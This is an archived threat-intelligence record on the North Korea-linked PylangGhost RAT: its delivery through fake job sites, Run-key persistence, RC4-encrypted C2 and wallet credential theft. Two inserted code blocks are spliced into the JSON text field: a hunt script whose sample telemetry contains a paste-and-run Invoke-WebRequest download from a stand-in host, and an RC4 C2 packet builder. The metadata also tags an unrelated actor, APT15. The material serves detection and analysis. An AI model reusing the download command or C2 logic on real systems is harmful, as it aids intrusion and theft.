{
	"id": "b98be521-7c19-4521-a170-4f3ec100d836",
	"created_at": "2026-04-06T00:09:11.423607Z",
	"updated_at": "2026-04-10T03:36:17.205319Z",
	"deleted_at": null,
	"sha1_hash": "3915bc15f74d2c9fa1f4ebf96b080f770c7a021a",
	"title": "Famous Chollima’s PylangGhost",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2905224,
	"plain_text": "Famous Chollima’s PylangGhost\r\nBy The Hivemind\r\nArchived: 2026-04-05 17:25:43 UTC\r\nVerticals Targeted: Cryptocurrency\r\nRegions Targeted: India\r\nRelated Families: GolangGhost\r\nExecutive Summary\r\nFamous Chollima, a North Korea-aligned threat actor, has deployed PylangGhost, a Python-based remote access trojan (RAT), against cryptocurrency and blockchain professionals in India. The malware is a variant of the GolangGhost RAT; it is delivered through social engineering and, once running, gives the operator credential theft and remote control of the infected system.\r\nKey Takeaways\r\nPylangGhost, a Python-based RAT, mirrors the functionality of the GolangGhost RAT and targets Windows systems in the cryptocurrency and blockchain sectors.\r\nThe malware is delivered through fake job recruitment sites that use social engineering to get victims to run the malicious command themselves.\r\nhttps://blog.polyswarm.io/famous-chollimas-pylangghost\r\nPage 1 of 3\n\nPylangGhost steals credentials from over 80 browser extensions, including cryptocurrency wallets and password managers.\r\nWhat is PylangGhost?\r\nIn May 2025, Cisco Talos identified PylangGhost, a Python-based remote access trojan (RAT) deployed by the North Korea-aligned threat actor Famous Chollima. PylangGhost targets Windows systems, while its predecessor, the Golang-based GolangGhost RAT, continues to target macOS users. It is delivered through a social engineering campaign aimed at professionals in the cryptocurrency and blockchain industries, primarily in India. The campaign exploits job seekers by posing as recruiters from reputable companies, such as Coinbase and Robinhood, to lure victims into executing malicious code.\r\nThe infection chain begins when victims are directed to fake job application websites that instruct them to copy a command line and run it themselves; the command typically uses PowerShell’s Invoke-WebRequest or curl.
This command downloads a ZIP file containing PylangGhost’s six Python modules, a Visual Basic Script (VBS), and a renamed Python interpreter; the RAT’s entry-point script is “nvidia.py.” The VBS unzips a Python library (“lib.zip”) and launches the RAT by executing the renamed interpreter with “nvidia.py” as the main program. This script establishes persistence by creating a registry value so that the RAT runs at login, generates a unique GUID that identifies the system to the command-and-control (C2) server, and then enters a command loop that exchanges RC4-encrypted HTTP packets with the C2 server.\r\nPylangGhost’s functionality is nearly identical to GolangGhost’s: remote system control, file manipulation, and credential theft from over 80 browser extensions, including cryptocurrency wallets such as MetaMask, Phantom, and TronLink and password managers such as 1Password and NordPass. The Python modules are well structured, and their naming conventions and architecture closely resemble those of the Golang variant, suggesting a single development team. The configuration file “config.py” defines the same command set as GolangGhost, so the two variants behave consistently.\r\nThe campaign’s focus on cryptocurrency and blockchain professionals underscores Famous Chollima’s financial motivation, most likely the theft of credentials and assets. Open-source intelligence indicates limited impact, with a small number of affected users, predominantly in India, which points to a targeted rather than widespread campaign. The use of Python for Windows and Golang for macOS may reflect a choice to optimize platform-specific delivery or evade detection, though the rationale for maintaining two variants remains unclear.\r\n
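The delivery chain described above (a paste-and-run download of a ZIP, a VBS launcher, a renamed Python interpreter started with “nvidia.py”, and a Run-key value for persistence) is the part a defender can hunt for. The following is an added example written for this page, not code from the bulletin, from PolySwarm or from Talos: a small Python hunt over constructed Sysmon-style process-create and registry-set events. The event shape, host names, paths, the ZIP and VBS file names and the interpreter name “nvidia.exe” are assumptions; only “nvidia.py”, the Run-key persistence and the download via Invoke-WebRequest or curl come from the text.

```python
import re

BS = chr(92)  # the Windows path separator; paths are normalised to '/' first

# Constructed endpoint telemetry, loosely modelled on Sysmon process-create
# (id 1) and registry-value-set (id 13) records. Hosts, paths, the ZIP and VBS
# names and the renamed interpreter name 'nvidia.exe' are all assumptions.
EVENTS = [
    {'id': 1, 'host': 'ws01', 'ts': 1,
     'image': 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
     'cmd': 'powershell -c Invoke-WebRequest https://example.invalid/interview/camera_fix.zip -OutFile C:/Users/dev/AppData/Local/Temp/fix.zip'},
    {'id': 1, 'host': 'ws01', 'ts': 2,
     'image': 'C:/Windows/System32/wscript.exe',
     'cmd': 'wscript.exe C:/Users/dev/AppData/Local/Temp/fix/update.vbs'},
    {'id': 1, 'host': 'ws01', 'ts': 3,
     'image': 'C:/Users/dev/AppData/Local/Temp/fix/nvidia.exe',
     'cmd': 'nvidia.exe nvidia.py'},
    {'id': 13, 'host': 'ws01', 'ts': 4,
     'target': 'HKU/S-1-5-21-1/Software/Microsoft/Windows/CurrentVersion/Run/nvidia',
     'details': 'C:/Users/dev/AppData/Local/Temp/fix/nvidia.exe C:/Users/dev/AppData/Local/Temp/fix/nvidia.py'},
    # Benign noise on another host: a developer running the stock interpreter
    # and a normal autostart entry.
    {'id': 1, 'host': 'ws02', 'ts': 5,
     'image': 'C:/Python312/python.exe', 'cmd': 'python.exe build.py'},
    {'id': 13, 'host': 'ws02', 'ts': 6,
     'target': 'HKU/S-1-5-21-2/Software/Microsoft/Windows/CurrentVersion/Run/OneDrive',
     'details': 'C:/Users/bob/AppData/Local/Microsoft/OneDrive/OneDrive.exe /background'},
]

# Stage 1: a paste-and-run download of a ZIP via Invoke-WebRequest/iwr/curl.
DOWNLOAD_RE = re.compile(r'(invoke-webrequest|iwr |curl )[^|;]*[.]zip')
CHAIN = ['download', 'vbs_launcher', 'renamed_interpreter', 'run_key_persistence']


def norm(path):
    return path.replace(BS, '/').lower()


def basename(path):
    return norm(path).rsplit('/', 1)[-1]


def stage(ev):
    # Map one event to the chain stage it evidences, or None.
    if ev['id'] == 1:
        img, cmd = basename(ev['image']), norm(ev['cmd'])
        if DOWNLOAD_RE.search(cmd):
            return 'download'
        if img in ('wscript.exe', 'cscript.exe') and '.vbs' in cmd:
            return 'vbs_launcher'
        # A .py main script handed to a binary that is not the stock python
        # executable: the renamed-interpreter trick. Heuristic; tune it for
        # environments that legitimately embed Python under another name.
        args = cmd.split()[1:]
        if any(a.endswith('.py') for a in args) and not img.startswith('python'):
            return 'renamed_interpreter'
    elif ev['id'] == 13:
        if '/currentversion/run/' in norm(ev['target']) and '.py' in norm(ev['details']):
            return 'run_key_persistence'
    return None


def hunt(events, min_stages=3):
    # Collect the stages seen per host in time order; report hosts where at
    # least min_stages distinct stages appear, listed in chain order.
    seen = {}
    for ev in sorted(events, key=lambda e: e['ts']):
        s = stage(ev)
        if s is not None:
            seen.setdefault(ev['host'], {}).setdefault(s, ev['ts'])
    return {h: [s for s in CHAIN if s in st]
            for h, st in seen.items() if len(st) >= min_stages}


if __name__ == '__main__':
    for host, stages in hunt(EVENTS).items():
        print(host, '->', ' > '.join(stages))
```

Run as a script it prints the flagged host and the stages observed on it. The renamed-interpreter rule is the noisiest of the four and will fire on legitimate applications that ship an embedded Python under their own name, so pair it with the Run-key and download stages rather than alerting on it alone.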
The close alignment between PylangGhost and GolangGhost highlights Famous Chollima’s evolving tactics.\r\nWho is Famous Chollima?\r\nFamous Chollima, also known as Wagemole, Nickel Tapestry, Purple Bravo, Tenacious Pungsan, Void Dokkaebi, Storm-1877, and UNC5267, is a North Korea-nexus threat actor active since at least 2018. Its activities focus on financial gain and espionage in support of the DPRK regime. The group is assessed to be affiliated with North Korea’s Reconnaissance General Bureau, a key intelligence service.\r\nFamous Chollima employs elaborate social engineering, including posing as legitimate remote IT workers to infiltrate organizations. Operators create fraudulent identities, falsify resumes, and use generative AI to craft convincing profiles, securing roles at small and mid-sized businesses via platforms such as Upwork and LinkedIn. Once embedded, they deploy custom malware, such as BeaverTail and InvisibleFerret, to steal credentials and sensitive data. The group also runs fake job recruitment campaigns that deliver Python-based RATs such as PylangGhost to the cryptocurrency and blockchain sectors. It establishes persistence through registry modifications and uses RC4-encrypted HTTP for command-and-control communication.\r\nFamous Chollima targets the cryptocurrency, blockchain, and technology sectors, with a notable focus on India and Western countries, including the US, Germany, and Ukraine. Its operations fund North Korea’s regime through illicitly earned salaries and stolen assets, evading international sanctions.\r\n
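Both sections above note that the RAT talks to its C2 over RC4-encrypted HTTP and identifies the host with a generated GUID. The following Python is an added example written for this page, not the malware’s code and not from the bulletin: a plain RC4 implementation applied to a constructed packet, with the structural check an analyst needs because RC4 under a wrong key returns plausible-looking noise rather than an error. The key, the packet layout (a 36-character text GUID followed directly by the command) and the sample GUID are assumptions; a real key has to be recovered from the sample’s configuration.

```python
import re


def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA); XOR makes encryption and
    # decryption the same operation.
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


ASSUMED_KEY = b'example-c2-key'  # placeholder assumption, not the real key
SAMPLE_GUID = '0f3c1a2b-7d4e-4b9c-8a1d-2e3f4a5b6c7d'  # constructed victim GUID
GUID_RE = re.compile(r'^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$')


def build_packet(guid: str, command: str, key: bytes = ASSUMED_KEY) -> bytes:
    # Assumed layout: 36-byte text GUID immediately followed by the command.
    return rc4(key, (guid + command).encode('ascii'))


def parse_packet(blob: bytes, key: bytes = ASSUMED_KEY) -> dict:
    # RC4 never fails on a wrong key; it just returns noise. Validate the
    # plaintext structure before trusting anything decoded from a capture.
    plain = rc4(key, blob)
    guid = plain[:36].decode('ascii', 'replace')
    command = plain[36:].decode('ascii', 'replace')
    if not GUID_RE.match(guid):
        return {'ok': False, 'reason': 'no GUID prefix: wrong key or wrong layout'}
    return {'ok': True, 'guid': guid, 'command': command}


if __name__ == '__main__':
    pkt = build_packet(SAMPLE_GUID, 'info')
    print(pkt.hex())
    print(parse_packet(pkt))
    print(parse_packet(pkt, b'wrong-key'))
```

Two properties of this channel matter for analysis. RC4 provides confidentiality only, so nothing stops a defender or a rival from forging or modifying packets once the key is known. And if, as assumed here, the key is static and no per-message nonce is mixed in, every packet is encrypted under the identical keystream: XORing a captured packet against a known plaintext prefix (the GUID, which is also recoverable from the host) yields the keystream for those byte positions in every other packet from the same implant.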
The group’s infrastructure often relies on anonymization networks to conceal its activities.\r\nIOCs\r\nPolySwarm has a sample associated with this activity.\r\nSHA-256: c2137cd870de0af6662f56c97d27b86004f47b866ab27190a97bde7518a9ac1b\r\nYou can use the following CLI command to search for all PylangGhost samples in our portal:\r\n$ polyswarm link list -f PylangGhost\r\nContact us at hivemind@polyswarm.io\r\nTopics: Blockchain, Threat Bulletin, North Korea, India, Malware, Python, Cryptocurrency, RAT, PylangGhost, GolangGhost, Famous Chollima\r\nSource: https://blog.polyswarm.io/famous-chollimas-pylangghost",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.polyswarm.io/famous-chollimas-pylangghost"
	],
	"report_names": [
		"famous-chollimas-pylangghost"
	],
	"threat_actors": [
		{
			"id": "32e2c6f9-a1f5-42bc-ac1d-5d9dc301cf0e",
			"created_at": "2025-08-07T02:03:25.078429Z",
			"updated_at": "2026-04-10T02:00:03.811418Z",
			"deleted_at": null,
			"main_name": "NICKEL ALLEY",
			"aliases": [
				"CL-STA-0240 ",
				"Purplebravo Recorded Future",
				"Storm-1877 ",
				"Tenacious Pungsan "
			],
			"source_name": "Secureworks:NICKEL ALLEY",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7187a642-699d-44b2-9c69-498c80bce81f",
			"created_at": "2025-08-07T02:03:25.105688Z",
			"updated_at": "2026-04-10T02:00:03.78394Z",
			"deleted_at": null,
			"main_name": "NICKEL TAPESTRY",
			"aliases": [
				"CL-STA-0237 ",
				"CL-STA-0241 ",
				"DPRK IT Workers",
				"Famous Chollima ",
				"Jasper Sleet Microsoft",
				"Purpledelta Recorded Future",
				"Storm-0287 ",
				"UNC5267 ",
				"Wagemole "
			],
			"source_name": "Secureworks:NICKEL TAPESTRY",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7d5531e2-0ad1-4237-beed-af009035576f",
			"created_at": "2024-05-01T02:03:07.977868Z",
			"updated_at": "2026-04-10T02:00:03.817883Z",
			"deleted_at": null,
			"main_name": "BRONZE PALACE",
			"aliases": [
				"APT15 ",
				"BRONZE DAVENPORT ",
				"BRONZE IDLEWOOD ",
				"CTG-6119 ",
				"CTG-9246 ",
				"Ke3chang ",
				"NICKEL ",
				"Nylon Typhoon ",
				"Playful Dragon",
				"Vixen Panda "
			],
			"source_name": "Secureworks:BRONZE PALACE",
			"tools": [
				"BMW",
				"BS2005",
				"Enfal",
				"Mirage",
				"RoyalCLI",
				"RoyalDNS"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d05e8567-9517-4bd8-a952-5e8d66f68923",
			"created_at": "2024-11-13T13:15:31.114471Z",
			"updated_at": "2026-04-10T02:00:03.761535Z",
			"deleted_at": null,
			"main_name": "WageMole",
			"aliases": [
				"Void Dokkaebi",
				"WaterPlum",
				"PurpleBravo",
				"Famous Chollima",
				"UNC5267",
				"Wagemole",
				"Nickel Tapestry",
				"Storm-1877"
			],
			"source_name": "MISPGALAXY:WageMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ef59a0d9-c556-4448-8553-ed28f315d352",
			"created_at": "2025-06-29T02:01:57.047978Z",
			"updated_at": "2026-04-10T02:00:04.744218Z",
			"deleted_at": null,
			"main_name": "Operation Contagious Interview",
			"aliases": [
				"Jasper Sleet",
				"Nickel Tapestry",
				"Operation Contagious Interview",
				"PurpleBravo",
				"Storm-0287",
				"Tenacious Pungsan",
				"UNC5267",
				"Wagemole",
				"WaterPlum"
			],
			"source_name": "ETDA:Operation Contagious Interview",
			"tools": [
				"BeaverTail",
				"InvisibleFerret",
				"OtterCookie",
				"PylangGhost"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434151,
	"ts_updated_at": 1775792177,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3915bc15f74d2c9fa1f4ebf96b080f770c7a021a.pdf",
		"text": "https://archive.orkl.eu/3915bc15f74d2c9fa1f4ebf96b080f770c7a021a.txt",
		"img": "https://archive.orkl.eu/3915bc15f74d2c9fa1f4ebf96b080f770c7a021a.jpg"
	}
}